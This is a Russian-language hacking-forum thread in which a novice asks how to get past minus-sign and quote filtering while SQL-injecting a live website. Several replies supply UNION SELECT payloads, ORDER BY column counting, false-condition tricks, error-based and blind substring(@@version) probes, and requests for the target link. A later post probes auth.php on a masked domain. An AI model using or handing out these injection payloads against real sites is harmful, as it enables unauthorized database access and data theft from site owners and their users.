11.01.2011, 11:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
подскажите как обойти фильтрацию минуса
делаю
Сообщение от None
id=1+union+select+version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion()+--+
поля версии не видно
делаю
перенаправляет на главную страницу |
|
|
11.01.2011, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от noviyuser
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу
limit+1,1
|
|
|
|
11.01.2011, 11:22
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
noviyuser
зафелси запрос более мягко,
and+1!=1
and+1>2
and+verson()=user()
и тп.
если видны ошибки мускула, попробуй эррор бейсд.
|
|
|
|
11.01.2011, 11:31
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от noviyuser
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу
ну по всей же видимости
Код:
id=1+and+1=0+union+select+version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version()+--+
да и потом, бывают случаи, когда при не совпадении типа выводимых данных срабатывает редирект, по этому конструкция что в твоем запросе (вывод кучи функций version()) не самый верный.
|
|
|
|
11.01.2011, 11:32
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()
ни один из способов не помог
вроде не слепая пробовал
and+substring(@@version,1,1)=4
and+substring(@@version,1,1)=5
пробовал и так и так
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+
id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+
если ставлю кавычку или минус перенаправляет
|
|
|
|
11.01.2011, 11:33
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
link pls
|
|
|
|
11.01.2011, 12:02
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от noviyuser
точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()
ни один из способов не помог
вроде не слепая пробовал
and+substring(@@version,1,1)=4
and+substring(@@version,1,1)=5
пробовал и так и так
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+
id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+
если ставлю кавычку или минус перенаправляет
а как ты пришел к выводу, что там 19 полей?
|
|
|
|
11.01.2011, 12:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Expl0ited
а как ты пришел к выводу, что там 19 полей?
order+by+19
на таком перенаправляет
order+by+20
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20
тоже перенаправляет
null тоже не помогает
|
|
|
|
11.01.2011, 12:24
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от noviyuser
order+by+19
на таком перенаправляет
order+by+20
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20
тоже перенаправляет
замени цифры на null
[upd] тогда кидай линк.
|
|
|
|
11.01.2011, 14:36
|
|
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
С нами:
8680278
Репутация:
17
|
|
Глупый вопрос:
если я делаю запрос
Код:
www.xxx.ru/auth.php?id=1'
ничего не происходит, открывает ту же самою страницу,
То есть ' фильтруется?
/// Мдаа... |
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Комбинированный вид
